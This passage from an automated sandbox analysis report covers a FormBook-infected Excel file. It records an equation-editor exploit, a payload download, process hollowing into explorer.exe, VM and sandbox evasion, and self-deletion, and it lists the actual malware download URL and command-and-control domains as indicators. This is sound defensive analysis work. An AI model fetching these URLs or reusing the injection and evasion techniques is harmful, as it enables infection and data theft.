          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041CD74 push eax; ret 5_2_0041CD76
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_00414EAF pushad; ret 5_2_00414EB0
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041CF70 pushad; ret 5_2_0041CF74
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_0041B7D5 push eax; ret 5_2_0041B828
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_010EA0FF push es; iretd 5_2_010EA151
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_010E9A2A push es; retf 5_2_010E9A37
          Source: C:\Users\Public\Pcportk28.exe | Code function: 5_2_010E9767 push 3A000004h; retf 0000h 5_2_010E976C
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0252DFA1 push ecx; ret 7_2_0252DFB4
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000F53E0 push es; retf 7_2_000F53E9
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FB7D5 push eax; ret 7_2_000FB828
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FB82B push eax; ret 7_2_000FB892
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FB822 push eax; ret 7_2_000FB828
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FB88C push eax; ret 7_2_000FB892
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000F5C4E push ebp; ret 7_2_000F5C57
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FCD74 push eax; ret 7_2_000FCD76
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000F4EAF pushad; ret 7_2_000F4EB0
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FCF70 pushad; ret 7_2_000FCF74
          Source: initial sample | Static PE information: section name: .text entropy: 7.09183457807
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\Pcportk28.exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\Pcportk28.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Pcportk28.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wininit.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match; File source: 4.2.Pcportk28.exe.259637c.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.Pcportk28.exe.259e388.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.Pcportk28.exe.25b30a4.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: Process Memory Space: Pcportk28.exe PID: 2124, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Pcportk28.exe, 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp; Binary or memory string: SBIEDLL.DLL
          Source: Pcportk28.exe, 00000004.00000002.486571220.0000000002581000.00000004.00000001.sdmp, Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp; Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\Pcportk28.exe; RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\Pcportk28.exe; RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exe; RDTSC instruction interceptor: First address: 00000000000E8604 second address: 00000000000E860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wininit.exe; RDTSC instruction interceptor: First address: 00000000000E899E second address: 00000000000E89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2780; Thread sleep time: -180000s >= -30000s
          Source: C:\Users\Public\Pcportk28.exe TID: 836; Thread sleep time: -34932s >= -30000s
          Source: C:\Users\Public\Pcportk28.exe TID: 2128; Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\wininit.exe TID: 672; Thread sleep time: -38000s >= -30000s
          Source: C:\Windows\SysWOW64\wininit.exe; Last function: Thread delayed
          Source: C:\Users\Public\Pcportk28.exe; Code function: 5_2_004088D0 rdtsc 5_2_004088D0
          Source: C:\Users\Public\Pcportk28.exe; Thread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Pcportk28.exe; Process information queried: ProcessInformation
          Source: C:\Users\Public\Pcportk28.exe; Thread delayed: delay time: 34932
          Source: C:\Users\Public\Pcportk28.exe; Thread delayed: delay time: 922337203685477
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp; Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmp; Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
          Source: Pcportk28.exe, 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp; Binary or memory string: +Qemu
          Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmp; Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp; Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp; Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp; Binary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.552119754.000000000457A000.00000004.00000001.sdmp; Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.487654318.000000000029B000.00000004.00000020.sdmp; Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp; Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp; Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\Pcportk28.exe; Code function: 5_2_004088D0 rdtsc 5_2_004088D0
          Source: C:\Users\Public\Pcportk28.exe; Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wininit.exe; Process token adjusted: Debug
          Source: C:\Users\Public\Pcportk28.exe; Code function: 5_2_008626F8 mov eax, dword ptr fs:[00000030h] 5_2_008626F8
          Source: C:\Windows\SysWOW64\wininit.exe; Code function: 7_2_025326F8 mov eax, dword ptr fs:[00000030h] 7_2_025326F8
          Source: C:\Users\Public\Pcportk28.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wininit.exe; Process queried: DebugPort
          Source: C:\Users\Public\Pcportk28.exe; Code function: 5_2_00409B40 LdrLoadDll, 5_2_00409B40
          Source: C:\Users\Public\Pcportk28.exe; Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe; Domain query: www.executive-air.net
          Source: C:\Windows\explorer.exe; Domain query: www.bitcointradel.com
          Source: C:\Windows\explorer.exe; Network Connect: 162.0.209.73 80
          Source: C:\Windows\explorer.exe; Domain query: www.freeadakahamazon.com
          Source: C:\Windows\explorer.exe; Network Connect: 118.67.131.217 80
          Source: C:\Windows\explorer.exe; Domain query: www.fisioletsgo.com
          Source: C:\Windows\explorer.exe; Domain query: www.luckyfandom.com
          Source: C:\Windows\explorer.exe; Network Connect: 216.239.34.21 80
          Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
          Sample uses process hollowing technique
          Source: C:\Users\Public\Pcportk28.exe; Section unmapped: C:\Windows\SysWOW64\wininit.exe base address: 6F0000
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\Pcportk28.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\Pcportk28.exe; Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write (2 identical events)
          Source: C:\Windows\SysWOW64\wininit.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wininit.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\Pcportk28.exe; Memory written: C:\Users\Public\Pcportk28.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\Pcportk28.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\Pcportk28.exe; Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\wininit.exe; Thread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Users\Public\Pcportk28.exe; Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe
          Source: C:\Windows\SysWOW64\wininit.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"
          Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp; Binary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmp; Binary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmp; Binary or memory string: Program Manager<
          Source: C:\Users\Public\Pcportk28.exe; Queries volume information: C:\Users\Public\Pcportk28.exe VolumeInformation
          Source: C:\Users\Public\Pcportk28.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\Public\Pcportk28.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match; File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match; File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules1 | DLL Side-Loading1 | Process Injection612 | Masquerading111 | OS Credential Dumping | Security Software Discovery221 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Exploitation for Client Execution13 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Modify Registry1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer4 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion31 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol114 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection612 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information1 | Cached Domain Credentials | System Information Discovery113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information4 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing23 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | DLL Side-Loading1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |

          Behavior Graph

          Behavior Graph ID: 553293; Sample: SWIFT - Copy - Copy.xlsx; Startdate: 14/01/2022; Architecture: WINDOWS; Score: 100

          Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 15 other signatures

          Process tree recovered from the graph:

          • EXCEL.EXE (started)
            Dropped: C:\Users\user\...\~$SWIFT - Copy - Copy.xlsx, data
          • EQNEDT32.EXE (started)
            DNS/IP: mikeloayza.com 131.153.37.4, ports 443, 49167, 49168, SSASN2US, United States
            Dropped: C:\Users\user\AppData\Local\...\i4L[1].exe, PE32; C:\Users\Public\Pcportk28.exe, PE32
            Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            • Pcportk28.exe (started)
              Signatures: Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
              • Pcportk28.exe (started)
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                • explorer.exe (injected)
                  DNS/IP: www.luckyfandom.com 118.67.131.217, ports 49173, 80, CLEAR-AS-APClearNetworksPtyLtdAU, Korea Republic of; bitcointradel.com 162.0.209.73, ports 49171, 80, ACPCA, Canada; 5 other IPs or domains
                  Signature: System process connects to network (likely due to code injection or exploit)
                  • wininit.exe (started)
                    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                    • cmd.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          SWIFT - Copy - Copy.xlsx | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\Public\Pcportk28.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe | 100% | Joe Sandbox ML |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.2.Pcportk28.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.Pcportk28.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.Pcportk28.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.Pcportk28.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          mikeloayza.com | 3% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://mikeloayza.com/E9/i4L.exe | 100% | Avira URL Cloud | malware
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p | 0% | Avira URL Cloud | safe
          http://java.sun.com | 0% | URL Reputation | safe
          http://www.fisioletsgo.com/i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p | 0% | Avira URL Cloud | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://www.luckyfandom.com/i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p | 0% | Avira URL Cloud | safe
          www.healingandhealthy.com/i6ro/ | 0% | Avira URL Cloud | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.executive-air.net/i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p | 0% | Avira URL Cloud | safe
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
          https://mikeloayza.com/E9/i4L.exe | 100% | Avira URL Cloud | malware

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.luckyfandom.com | 118.67.131.217 | true | true | | unknown
          mikeloayza.com | 131.153.37.4 | true | true | | unknown
          bitcointradel.com | 162.0.209.73 | true | true | | unknown
          executive-air.net | 34.102.136.180 | true | false | | unknown
          www.fisioletsgo.com | 216.239.34.21 | true | false | | unknown
          www.executive-air.net | unknown | unknown | true | | unknown
          www.bitcointradel.com | unknown | unknown | true | | unknown
          www.freeadakahamazon.com | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://mikeloayza.com/E9/i4L.exe | true | Avira URL Cloud: malware | unknown
          http://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p | true | Avira URL Cloud: safe | unknown
          http://www.fisioletsgo.com/i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p | false | Avira URL Cloud: safe | unknown
          http://www.luckyfandom.com/i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p | true | Avira URL Cloud: safe | unknown
          www.healingandhealthy.com/i6ro/ | true | Avira URL Cloud: safe | low
          http://www.executive-air.net/i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p | false | Avira URL Cloud: safe | unknown
          https://mikeloayza.com/E9/i4L.exe | true | Avira URL Cloud: malware | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://investor.msn.com | explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://treyresearch.net | explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp | false | | high
          http://java.sun.com | explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
          http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.498553162.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmp | false | | high
          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp | false | | high
          http://investor.msn.com/ | explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.499989252.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.551993194.0000000004513000.00000004.00000001.sdmp | false | | high
          http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.493463383.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
          http://www.%s.comPA | explorer.exe, 00000006.00000000.497685808.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
          http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp | false | | high
          https://support.mozilla.org | explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp | false | | high
          http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.551082192.0000000003E50000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
